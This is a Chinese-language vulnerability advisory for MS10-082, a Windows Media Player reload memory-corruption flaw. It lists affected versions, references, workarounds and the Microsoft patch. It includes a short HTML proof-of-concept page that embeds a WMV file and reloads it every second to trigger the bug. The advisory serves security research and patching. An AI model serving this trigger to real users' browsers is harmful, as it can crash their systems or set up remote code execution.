Microsoft Windows Media Player重新加载操作内存破坏漏洞(MS10-082)

  • 发表于
  • Vulndb

发布时间:2010-10-12
影响版本:
Microsoft Windows Media Player 9.0
Microsoft Windows Media Player 12
Microsoft Windows Media Player 11
Microsoft Windows Media Player 10.0

漏洞描述:

Windows Media Player是微软操作系统中默认捆绑的媒体播放器。

Windows Media Player在重新加载操作过程中通过Web浏览器取消分配对象的方式中存在内存破坏漏洞。如果用户访问特制网页,此漏洞可能允许远程执行代码。如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。

<*参考
http://secunia.com/advisories/41779/
http://code.google.com/p/skylined/issues/detail?id=21
http://www.microsoft.com/technet/security/bulletin/MS10-082.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA10-285A.html
*>

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<body onload="setTimeout('location.reload()', 1000);">
<embed type="application/x-mplayer2" src="file.wmv"></embed>
</body>
</html>

安全建议:

临时解决方法:

* 注销wmp.dll

对于32位Windows:
Regsvr32.exe –u %WINDIR%\system32\wmp.dll

对于64位Windows:
Regsvr32.exe –u %WINDIR%\system32\wmp.dll
Regsvr32.exe –u %WINDIR%\syswow64\wmp.dll

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS10-082)以及相应补丁:
MS10-082:Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111)
链接:http://www.microsoft.com/technet/security/bulletin/MS10-082.mspx?pf=true